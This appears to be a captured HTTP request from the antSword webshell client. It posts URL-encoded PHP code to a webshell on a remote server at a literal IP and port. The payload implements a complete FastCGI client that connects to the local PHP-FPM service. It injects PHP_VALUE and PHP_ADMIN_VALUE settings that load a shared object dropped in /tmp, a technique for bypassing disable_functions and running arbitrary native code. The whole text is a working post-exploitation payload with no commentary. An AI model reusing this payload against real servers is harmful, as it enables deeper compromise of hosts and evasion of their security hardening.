POST / HTTP/1.1
Host: 39.108.164.219:60004
User-Agent: antSword/v2.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 22213
Connection: close

ant=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3Bfunction%20asenc(%24out)%7Breturn%20%24out%3B%7D%3Bfunction%20asoutput()%7B%24output%3Dob_get_contents()%3Bob_end_clean()%3Becho%20%22591aa%22%3Becho%20%40asenc(%24output)%3Becho%20%22e3a41%22%3B%7Dob_start()%3Btry%7Bclass%20TimedOutException%20extends%20%5CException%20%7B%7D%20class%20ForbiddenException%20extends%20%5CException%20%7B%7D%20class%20Client%20%7B%20%20%20const%20VERSION_1%20%20%20%20%20%20%20%20%20%20%20%20%3D%201%3B%20%20%20const%20BEGIN_REQUEST%20%20%20%20%20%20%20%20%3D%201%3B%20%20%20const%20ABORT_REQUEST%20%20%20%20%20%20%20%20%3D%202%3B%20%20%20const%20END_REQUEST%20%20%20%20%20%20%20%20%20%20%3D%203%3B%20%20%20const%20PARAMS%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3D%204%3B%20%20%20const%20STDIN%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3D%205%3B%20%20%20const%20STDOUT%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3D%206%3B%20%20%20const%20STDERR%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3D%207%3B%20%20%20const%20DATA%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3D%208%3B%20%20%20const%20GET_VALUES%20%20%20%20%20%20%20%20%20%20%20%3D%209%3B%20%20%20const%20GET_VALUES_RESULT%20%20%20%20%3D%2010%3B%20%20%20const%20UNKNOWN_TYPE%20%20%20%20%20%20%20%20%20%3D%2011%3B%20%20%20const%20MAXTYPE%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3D%20self%3A%3AUNKNOWN_TYPE%3B%20%20%20const%20RESPONDER%20%20%20%20%20%20%20%20%20%20%20%20%3D%201%3B%20%20%20const%20AUTHORIZER%20%20%20%20%20%20%20%20%20%20%20%3D%202%3B%20%20%20const%20FILTER%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3D%203%3B%20%20%20const%20REQUEST_COMPLETE%20%20%20%20%20%3D%200%3B%20%20%20const%20CANT_MPX_CONN%20%20%20%20%20%20%20%20%3D%201%3B%20%20%20const%20OVERLOADED%20%20%20%20%20%20%20%20%20%20%20%3D%202%3B%20%20%20const%20UNKNOWN_ROLE%20%20%20%20%20%20%20%20%20%3D%203%3B%20%20%20const%20MAX_CONNS%20%20%20%20%20%20%20%20%20%20%20%20%3D%20'MAX_CONNS'%3B%20%20%20const%20MAX_REQS%20%20%20%20%20%20%20%20%20%20%20%20%20%3D%20'MAX_REQS'%3B%20%20%20const%20MPXS_CONNS%20%20%20%20%20%20%20%20%20%20%20%3D%20'MPXS_CONNS'%3B%20%20%20const%20HEADER_LEN%20%20%20%20%20%20%20%20%20%20%20%3D%208%3B%20%20%20const%20REQ_STATE_WRITTEN%20%20%20%20%3D%201%3B%20%20%20const%20REQ_STATE_OK%20%20%20%20%20%20%20%20%20%3D%202%3B%20%20%20const%20REQ_STATE_ERR%20%20%20%20%20%20%20%20%3D%203%3B%20%20%20const%20REQ_STATE_TIMED_OUT%20%20%3D%204%3B%20%20%20private%20%24_sock%20%3D%20null%3B%20%20%20private%20%24_host%20%3D%20null%3B%20%20%20private%20%24_port%20%3D%20null%3B%20%20%20private%20%24_keepAlive%20%3D%20false%3B%20%20%20private%20%24_requests%20%3D%20array()%3B%20%20%20private%20%24_persistentSocket%20%3D%20false%3B%20%20%20private%20%24_connectTimeout%20%3D%205000%3B%20%20%20private%20%24_readWriteTimeout%20%3D%205000%3B%20%20%20public%20function%20__construct(%24host%2C%20%24port)%20%20%20%7B%20%20%20%20%20%24this-%3E_host%20%3D%20%24host%3B%20%20%20%20%20%24this-%3E_port%20%3D%20%24port%3B%20%20%20%7D%20%20%20public%20function%20setKeepAlive(%24b)%20%20%20%7B%20%20%20%20%20%24this-%3E_keepAlive%20%3D%20(boolean)%24b%3B%20%20%20%20%20if%20(!%24this-%3E_keepAlive%20%26%26%20%24this-%3E_sock)%20%7B%20%20%20%20%20%20%20fclose(%24this-%3E_sock)%3B%20%20%20%20%20%7D%20%20%20%7D%20%20%20public%20function%20getKeepAlive()%20%20%20%7B%20%20%20%20%20return%20%24this-%3E_keepAlive%3B%20%20%20%7D%20%20%20public%20function%20setPersistentSocket(%24b)%20%20%20%7B%20%20%20%20%20%24was_persistent%20%3D%20(%24this-%3E_sock%20%26%26%20%24this-%3E_persistentSocket)%3B%20%20%20%20%20%24this-%3E_persistentSocket%20%3D%20(boolean)%24b%3B%20%20%20%20%20if%20(!%24this-%3E_persistentSocket%20%26%26%20%24was_persistent)%20%7B%20%20%20%20%20%20%20fclose(%24this-%3E_sock)%3B%20%20%20%20%20%7D%20%20%20%7D%20%20%20public%20function%20getPersistentSocket()%20%20%20%7B%20%20%20%20%20return%20%24this-%3E_persistentSocket%3B%20%20%20%7D%20%20%20public%20function%20setConnectTimeout(%24timeoutMs)%20%20%20%7B%20%20%20%20%20%24this-%3E_connectTimeout%20%3D%20%24timeoutMs%3B%20%20%20%7D%20%20%20public%20function%20getConnectTimeout()%20%20%20%7B%20%20%20%20%20return%20%24this-%3E_connectTimeout%3B%20%20%20%7D%20%20%20public%20function%20setReadWriteTimeout(%24timeoutMs)%20%20%20%7B%20%20%20%20%20%24this-%3E_readWriteTimeout%20%3D%20%24timeoutMs%3B%20%20%20%20%20%24this-%3Eset_ms_timeout(%24this-%3E_readWriteTimeout)%3B%20%20%20%7D%20%20%20public%20function%20getReadWriteTimeout()%20%20%20%7B%20%20%20%20%20return%20%24this-%3E_readWriteTimeout%3B%20%20%20%7D%20%20%20private%20function%20set_ms_timeout(%24timeoutMs)%20%7B%20%20%20%20%20if%20(!%24this-%3E_sock)%20%7B%20%20%20%20%20%20%20return%20false%3B%20%20%20%20%20%7D%20%20%20%20%20return%20stream_set_timeout(%24this-%3E_sock%2C%20floor(%24timeoutMs%20%2F%201000)%2C%20(%24timeoutMs%20%25%201000)%20*%201000)%3B%20%20%20%7D%20%20%20private%20function%20connect()%20%20%20%7B%20%20%20%20%20if%20(!%24this-%3E_sock)%20%7B%20%20%20%20%20%20%20if%20(%24this-%3E_persistentSocket)%20%7B%20%20%20%20%20%20%20%20%20%24this-%3E_sock%20%3D%20pfsockopen(%24this-%3E_host%2C%20%24this-%3E_port%2C%20%24errno%2C%20%24errstr%2C%20%24this-%3E_connectTimeout%2F1000)%3B%20%20%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24this-%3E_sock%20%3D%20fsockopen(%24this-%3E_host%2C%20%24this-%3E_port%2C%20%24errno%2C%20%24errstr%2C%20%24this-%3E_connectTimeout%2F1000)%3B%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20if%20(!%24this-%3E_sock)%20%7B%20%20%20%20%20%20%20%20%20throw%20new%20%5CException('Unable%20to%20connect%20to%20FastCGI%20application%3A%20'%20.%20%24errstr)%3B%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20if%20(!%24this-%3Eset_ms_timeout(%24this-%3E_readWriteTimeout))%20%7B%20%20%20%20%20%20%20%20%20throw%20new%20%5CException('Unable%20to%20set%20timeout%20on%20socket')%3B%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%7D%20%20%20private%20function%20buildPacket(%24type%2C%20%24content%2C%20%24requestId%20%3D%201)%20%20%20%7B%20%20%20%20%20%24clen%20%3D%20strlen(%24content)%3B%20%20%20%20%20return%20chr(self%3A%3AVERSION_1)%20%20%20%20%20%20%20%20%20%2F*%20version%20*%2F%20%20%20%20%20%20%20%20%20.%20chr(%24type)%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2F*%20type%20*%2F%20%20%20%20%20%20%20%20%20.%20chr((%24requestId%20%3E%3E%208)%20%26%200xFF)%20%2F*%20requestIdB1%20*%2F%20%20%20%20%20%20%20%20%20.%20chr(%24requestId%20%26%200xFF)%20%20%20%20%20%20%20%20%2F*%20requestIdB0%20*%2F%20%20%20%20%20%20%20%20%20.%20chr((%24clen%20%3E%3E%208%20)%20%26%200xFF)%20%20%20%20%20%2F*%20contentLengthB1%20*%2F%20%20%20%20%20%20%20%20%20.%20chr(%24clen%20%26%200xFF)%20%20%20%20%20%20%20%20%20%20%20%20%20%2F*%20contentLengthB0%20*%2F%20%20%20%20%20%20%20%20%20.%20chr(0)%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2F*%20paddingLength%20*%2F%20%20%20%20%20%20%20%20%20.%20chr(0)%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2F*%20reserved%20*%2F%20%20%20%20%20%20%20%20%20.%20%24content%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2F*%20content%20*%2F%20%20%20%7D%20%20%20private%20function%20buildNvpair(%24name%2C%20%24value)%20%20%20%7B%20%20%20%20%20%20%20%24nlen%20%3D%20strlen(%24name)%3B%20%20%20%20%20%20%20%24vlen%20%3D%20strlen(%24value)%3B%20%20%20%20%20%20%20if%20(%24nlen%20%3C%20128)%20%7B%20%20%20%20%20%20%20%20%20%24nvpair%20%3D%20chr(%24nlen)%3B%20%20%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%20%20%24nvpair%20%3D%20chr((%24nlen%20%3E%3E%2024)%20%7C%200x80)%20.%20chr((%24nlen%20%3E%3E%2016)%20%26%200xFF)%20.%20chr((%24nlen%20%3E%3E%208)%20%26%200xFF)%20.%20chr(%24nlen%20%26%200xFF)%3B%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20if%20(%24vlen%20%3C%20128)%20%7B%20%20%20%20%20%20%20%20%20%20%20%24nvpair%20.%3D%20chr(%24vlen)%3B%20%20%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%20%20%24nvpair%20.%3D%20chr((%24vlen%20%3E%3E%2024)%20%7C%200x80)%20.%20chr((%24vlen%20%3E%3E%2016)%20%26%200xFF)%20.%20chr((%24vlen%20%3E%3E%208)%20%26%200xFF)%20.%20chr(%24vlen%20%26%200xFF)%3B%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20return%20%24nvpair%20.%20%24name%20.%20%24value%3B%20%20%20%7D%20%20%20private%20function%20readNvpair(%24data%2C%20%24length%20%3D%20null)%20%20%20%7B%20%20%20%20%20%20%20%24array%20%3D%20array()%3B%20%20%20%20%20%20%20if%20(%24length%20%3D%3D%3D%20null)%20%7B%20%20%20%20%20%20%20%20%20%20%20%24length%20%3D%20strlen(%24data)%3B%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%24p%20%3D%200%3B%20%20%20%20%20%20%20while%20(%24p%20!%3D%20%24length)%20%7B%20%20%20%20%20%20%20%20%20%20%20%24nlen%20%3D%20ord(%24data%7B%24p%2B%2B%7D)%3B%20%20%20%20%20%20%20%20%20%20%20if%20(%24nlen%20%3E%3D%20128)%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24nlen%20%3D%20(%24nlen%20%26%200x7F%20%3C%3C%2024)%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24nlen%20%7C%3D%20(ord(%24data%7B%24p%2B%2B%7D)%20%3C%3C%2016)%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24nlen%20%7C%3D%20(ord(%24data%7B%24p%2B%2B%7D)%20%3C%3C%208)%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24nlen%20%7C%3D%20(ord(%24data%7B%24p%2B%2B%7D))%3B%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%24vlen%20%3D%20ord(%24data%7B%24p%2B%2B%7D)%3B%20%20%20%20%20%20%20%20%20%20%20if%20(%24vlen%20%3E%3D%20128)%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24vlen%20%3D%20(%24nlen%20%26%200x7F%20%3C%3C%2024)%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24vlen%20%7C%3D%20(ord(%24data%7B%24p%2B%2B%7D)%20%3C%3C%2016)%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24vlen%20%7C%3D%20(ord(%24data%7B%24p%2B%2B%7D)%20%3C%3C%208)%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24vlen%20%7C%3D%20(ord(%24data%7B%24p%2B%2B%7D))%3B%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%24array%5Bsubstr(%24data%2C%20%24p%2C%20%24nlen)%5D%20%3D%20substr(%24data%2C%20%24p%2B%24nlen%2C%20%24vlen)%3B%20%20%20%20%20%20%20%20%20%20%20%24p%20%2B%3D%20(%24nlen%20%2B%20%24vlen)%3B%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20return%20%24array%3B%20%20%20%7D%20%20%20private%20function%20decodePacketHeader(%24data)%20%20%20%7B%20%20%20%20%20%20%20%24ret%20%3D%20array()%3B%20%20%20%20%20%20%20%24ret%5B'version'%5D%20%20%20%20%20%20%20%3D%20ord(%24data%7B0%7D)%3B%20%20%20%20%20%20%20%24ret%5B'type'%5D%20%20%20%20%20%20%20%20%20%20%3D%20ord(%24data%7B1%7D)%3B%20%20%20%20%20%20%20%24ret%5B'requestId'%5D%20%20%20%20%20%3D%20(ord(%24data%7B2%7D)%20%3C%3C%208)%20%2B%20ord(%24data%7B3%7D)%3B%20%20%20%20%20%20%20%24ret%5B'contentLength'%5D%20%3D%20(ord(%24data%7B4%7D)%20%3C%3C%208)%20%2B%20ord(%24data%7B5%7D)%3B%20%20%20%20%20%20%20%24ret%5B'paddingLength'%5D%20%3D%20ord(%24data%7B6%7D)%3B%20%20%20%20%20%20%20%24ret%5B'reserved'%5D%20%20%20%20%20%20%3D%20ord(%24data%7B7%7D)%3B%20%20%20%20%20%20%20return%20%24ret%3B%20%20%20%7D%20%20%20private%20function%20readPacket()%20%20%20%7B%20%20%20%20%20%20%20if%20(%24packet%20%3D%20fread(%24this-%3E_sock%2C%20self%3A%3AHEADER_LEN))%20%7B%20%20%20%20%20%20%20%20%20%20%20%24resp%20%3D%20%24this-%3EdecodePacketHeader(%24packet)%3B%20%20%20%20%20%20%20%20%20%20%20%24resp%5B'content'%5D%20%3D%20''%3B%20%20%20%20%20%20%20%20%20%20%20if%20(%24resp%5B'contentLength'%5D)%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24len%20%20%3D%20%24resp%5B'contentLength'%5D%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20while%20(%24len%20%26%26%20(%24buf%3Dfread(%24this-%3E_sock%2C%20%24len))%20!%3D%3D%20false)%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24len%20-%3D%20strlen(%24buf)%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24resp%5B'content'%5D%20.%3D%20%24buf%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20if%20(%24resp%5B'paddingLength'%5D)%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24buf%20%3D%20fread(%24this-%3E_sock%2C%20%24resp%5B'paddingLength'%5D)%3B%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20return%20%24resp%3B%20%20%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%20%20return%20false%3B%20%20%20%20%20%20%20%7D%20%20%20%7D%20%20%20public%20function%20getValues(array%20%24requestedInfo)%20%20%20%7B%20%20%20%20%20%20%20%24this-%3Econnect()%3B%20%20%20%20%20%20%20%24request%20%3D%20''%3B%20%20%20%20%20%20%20foreach%20(%24requestedInfo%20as%20%24info)%20%7B%20%20%20%20%20%20%20%20%20%20%20%24request%20.%3D%20%24this-%3EbuildNvpair(%24info%2C%20'')%3B%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20fwrite(%24this-%3E_sock%2C%20%24this-%3EbuildPacket(self%3A%3AGET_VALUES%2C%20%24request%2C%200))%3B%20%20%20%20%20%20%20%24resp%20%3D%20%24this-%3EreadPacket()%3B%20%20%20%20%20%20%20if%20(%24resp%5B'type'%5D%20%3D%3D%20self%3A%3AGET_VALUES_RESULT)%20%7B%20%20%20%20%20%20%20%20%20%20%20return%20%24this-%3EreadNvpair(%24resp%5B'content'%5D%2C%20%24resp%5B'length'%5D)%3B%20%20%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%20%20throw%20new%20%5CException('Unexpected%20response%20type%2C%20expecting%20GET_VALUES_RESULT')%3B%20%20%20%20%20%20%20%7D%20%20%20%7D%20%20%20public%20function%20request(array%20%24params%2C%20%24stdin)%20%20%20%7B%20%20%20%20%20%20%20%24id%20%3D%20%24this-%3Easync_request(%24params%2C%20%24stdin)%3B%20%20%20%20%20%20%20return%20%24this-%3Ewait_for_response(%24id)%3B%20%20%20%7D%20%20%20public%20function%20async_request(array%20%24params%2C%20%24stdin)%20%20%20%7B%20%20%20%20%20%20%20%24this-%3Econnect()%3B%20%20%20%20%20%20%20%24id%20%3D%20mt_rand(1%2C%20(1%20%3C%3C%2016)%20-%201)%3B%20%20%20%20%20%20%20%24keepAlive%20%3D%20intval(%24this-%3E_keepAlive%20%7C%7C%20%24this-%3E_persistentSocket)%3B%20%20%20%20%20%20%20%24request%20%3D%20%24this-%3EbuildPacket(self%3A%3ABEGIN_REQUEST%20%20%20%20%20%20%20%20%20%2Cchr(0)%20.%20chr(self%3A%3ARESPONDER)%20.%20chr(%24keepAlive)%20.%20str_repeat(chr(0)%2C%205)%20%20%20%20%20%20%20%20%20%2C%24id%20%20%20%20%20%20%20)%3B%20%20%20%20%20%20%20%24paramsRequest%20%3D%20''%3B%20%20%20%20%20%20%20foreach%20(%24params%20as%20%24key%20%3D%3E%20%24value)%20%7B%20%20%20%20%20%20%20%20%20%20%20%24paramsRequest%20.%3D%20%24this-%3EbuildNvpair(%24key%2C%20%24value%2C%20%24id)%3B%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20if%20(%24paramsRequest)%20%7B%20%20%20%20%20%20%20%20%20%20%20%24request%20.%3D%20%24this-%3EbuildPacket(self%3A%3APARAMS%2C%20%24paramsRequest%2C%20%24id)%3B%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%24request%20.%3D%20%24this-%3EbuildPacket(self%3A%3APARAMS%2C%20''%2C%20%24id)%3B%20%20%20%20%20%20%20if%20(%24stdin)%20%7B%20%20%20%20%20%20%20%20%20%20%20%24request%20.%3D%20%24this-%3EbuildPacket(self%3A%3ASTDIN%2C%20%24stdin%2C%20%24id)%3B%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%24request%20.%3D%20%24this-%3EbuildPacket(self%3A%3ASTDIN%2C%20''%2C%20%24id)%3B%20%20%20%20%20%20%20if%20(fwrite(%24this-%3E_sock%2C%20%24request)%20%3D%3D%3D%20false%20%7C%7C%20fflush(%24this-%3E_sock)%20%3D%3D%3D%20false)%20%7B%20%20%20%20%20%20%20%20%20%20%20%24info%20%3D%20stream_get_meta_data(%24this-%3E_sock)%3B%20%20%20%20%20%20%20%20%20%20%20if%20(%24info%5B'timed_out'%5D)%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20throw%20new%20TimedOutException('Write%20timed%20out')%3B%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20fclose(%24this-%3E_sock)%3B%20%20%20%20%20%20%20%20%20%20%20throw%20new%20%5CException('Failed%20to%20write%20request%20to%20socket')%3B%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%24this-%3E_requests%5B%24id%5D%20%3D%20array(%20%20%20%20%20%20%20%20%20%20%20'state'%20%3D%3E%20self%3A%3AREQ_STATE_WRITTEN%2C%20%20%20%20%20%20%20%20%20%20%20'response'%20%3D%3E%20null%20%20%20%20%20%20%20)%3B%20%20%20%20%20%20%20return%20%24id%3B%20%20%20%7D%20%20%20public%20function%20wait_for_response(%24requestId%2C%20%24timeoutMs%20%3D%200)%20%7B%20%20%20%20%20%20%20if%20(!isset(%24this-%3E_requests%5B%24requestId%5D))%20%7B%20%20%20%20%20%20%20%20%20%20%20throw%20new%20%5CException('Invalid%20request%20id%20given')%3B%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20if%20(%24this-%3E_requests%5B%24requestId%5D%5B'state'%5D%20%3D%3D%20self%3A%3AREQ_STATE_OK%20%20%20%20%20%20%20%20%20%20%20%7C%7C%20%24this-%3E_requests%5B%24requestId%5D%5B'state'%5D%20%3D%3D%20self%3A%3AREQ_STATE_ERR%20%20%20%20%20%20%20%20%20%20%20)%20%7B%20%20%20%20%20%20%20%20%20%20%20return%20%24this-%3E_requests%5B%24requestId%5D%5B'response'%5D%3B%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20if%20(%24timeoutMs%20%3E%200)%20%7B%20%20%20%20%20%20%20%20%20%20%20%24this-%3Eset_ms_timeout(%24timeoutMs)%3B%20%20%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%20%20%24timeoutMs%20%3D%20%24this-%3E_readWriteTimeout%3B%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%24startTime%20%3D%20microtime(true)%3B%20%20%20%20%20%20%20do%20%7B%20%20%20%20%20%20%20%20%20%20%20%24resp%20%3D%20%24this-%3EreadPacket()%3B%20%20%20%20%20%20%20%20%20%20%20if%20(%24resp%5B'type'%5D%20%3D%3D%20self%3A%3ASTDOUT%20%7C%7C%20%24resp%5B'type'%5D%20%3D%3D%20self%3A%3ASTDERR)%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20(%24resp%5B'type'%5D%20%3D%3D%20self%3A%3ASTDERR)%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24this-%3E_requests%5B%24resp%5B'requestId'%5D%5D%5B'state'%5D%20%3D%20self%3A%3AREQ_STATE_ERR%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24this-%3E_requests%5B%24resp%5B'requestId'%5D%5D%5B'response'%5D%20.%3D%20%24resp%5B'content'%5D%3B%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20if%20(%24resp%5B'type'%5D%20%3D%3D%20self%3A%3AEND_REQUEST)%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24this-%3E_requests%5B%24resp%5B'requestId'%5D%5D%5B'state'%5D%20%3D%20self%3A%3AREQ_STATE_OK%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20(%24resp%5B'requestId'%5D%20%3D%3D%20%24requestId)%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20break%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20if%20(microtime(true)%20-%20%24startTime%20%3E%3D%20(%24timeoutMs%20*%201000))%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24this-%3Eset_ms_timeout(%24this-%3E_readWriteTimeout)%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20throw%20new%20%5CException('Timed%20out')%3B%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%7D%20while%20(%24resp)%3B%20%20%20%20%20%20%20if%20(!is_array(%24resp))%20%7B%20%20%20%20%20%20%20%20%20%20%20%24info%20%3D%20stream_get_meta_data(%24this-%3E_sock)%3B%20%20%20%20%20%20%20%20%20%20%20%24this-%3Eset_ms_timeout(%24this-%3E_readWriteTimeout)%3B%20%20%20%20%20%20%20%20%20%20%20if%20(%24info%5B'timed_out'%5D)%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20throw%20new%20TimedOutException('Read%20timed%20out')%3B%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20if%20(%24info%5B'unread_bytes'%5D%20%3D%3D%200%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%26%26%20%24info%5B'blocked'%5D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%26%26%20%24info%5B'eof'%5D)%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20throw%20new%20ForbiddenException('Not%20in%20white%20list.%20Check%20listen.allowed_clients.')%3B%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20throw%20new%20%5CException('Read%20failed')%3B%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%24this-%3Eset_ms_timeout(%24this-%3E_readWriteTimeout)%3B%20%20%20%20%20%20%20switch%20(ord(%24resp%5B'content'%5D%7B4%7D))%20%7B%20%20%20%20%20%20%20%20%20%20%20case%20self%3A%3ACANT_MPX_CONN%3A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20throw%20new%20%5CException('This%20app%20can%5C't%20multiplex%20%5BCANT_MPX_CONN%5D')%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20break%3B%20%20%20%20%20%20%20%20%20%20%20case%20self%3A%3AOVERLOADED%3A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20throw%20new%20%5CException('New%20request%20rejected%3B%20too%20busy%20%5BOVERLOADED%5D')%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20break%3B%20%20%20%20%20%20%20%20%20%20%20case%20self%3A%3AUNKNOWN_ROLE%3A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20throw%20new%20%5CException('Role%20value%20not%20known%20%5BUNKNOWN_ROLE%5D')%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20break%3B%20%20%20%20%20%20%20%20%20%20%20case%20self%3A%3AREQUEST_COMPLETE%3A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%20%24this-%3E_requests%5B%24requestId%5D%5B'response'%5D%3B%20%20%20%20%20%20%20%7D%20%20%20%7D%20%7D%3B%20%20%20%3B%0A%20%20%20%20%20%20%20%20%20%20%24content%3D%22%22%3B%0A%20%20%20%20%20%20%20%20%20%20%24client%20%3D%20new%20Client('127.0.0.1'%2C9000)%3B%0A%20%20%20%20%20%20%20%20%20%20%24client-%3Erequest(array(%0A%20%20%20%20%20%20%20%20%20%20%20%20'GATEWAY_INTERFACE'%20%3D%3E%20'FastCGI%2F1.0'%2C%0A%20%20%20%20%20%20%20%20%20%20%20%20'REQUEST_METHOD'%20%3D%3E%20'POST'%2C%0A%20%20%20%20%20%20%20%20%20%20%20%20'SERVER_SOFTWARE'%20%3D%3E%20'php%2Ffcgiclient'%2C%0A%20%20%20%20%20%20%20%20%20%20%20%20'REMOTE_ADDR'%20%3D%3E%20'127.0.0.1'%2C%0A%20%20%20%20%20%20%20%20%20%20%20%20'REMOTE_PORT'%20%3D%3E%20'9984'%2C%0A%20%20%20%20%20%20%20%20%20%20%20%20'SERVER_ADDR'%20%3D%3E%20'127.0.0.1'%2C%0A%20%20%20%20%20%20%20%20%20%20%20%20'SERVER_PORT'%20%3D%3E%20'80'%2C%0A%20%20%20%20%20%20%20%20%20%20%20%20'SERVER_NAME'%20%3D%3E%20'mag-tured'%2C%0A%20%20%20%20%20%20%20%20%20%20%20%20'SERVER_PROTOCOL'%20%3D%3E%20'HTTP%2F1.1'%2C%0A%20%20%20%20%20%20%20%20%20%20%20%20'CONTENT_TYPE'%20%3D%3E%20'application%2Fx-www-form-urlencoded'%2C%0A%20%20%20%20%20%20%20%20%20%20%20%20'PHP_VALUE'%20%3D%3E%20'extension%3D%2Ftmp%2F.71546ant_x64.so'%2C%0A%20%20%20%20%20%20%20%20%20%20%20%20'PHP_ADMIN_VALUE'%20%3D%3E%20'extension%3D%2Ftmp%2F.71546ant_x64.so'%2C%0A%20%20%20%20%20%20%20%20%20%20%20%20'CONTENT_LENGTH'%20%3D%3E%20strlen(%24content)%0A%20%20%20%20%20%20%20%20%20%20%20%20)%2C%0A%20%20%20%20%20%20%20%20%20%20%20%20%24content%0A%20%20%20%20%20%20%20%20%20%20)%3B%0A%20%20%20%20%20%20%20%20%20%20sleep(1)%3B%0A%20%20%20%20%20%20%20%20%20%20echo(1)%3B%0A%20%20%20%20%20%20%20%20%3B%7Dcatch(Exception%20%24e)%7Becho%20%22ERROR%3A%2F%2F%22.%24e-%3EgetMessage()%3B%7D%3Basoutput()%3Bdie()%3B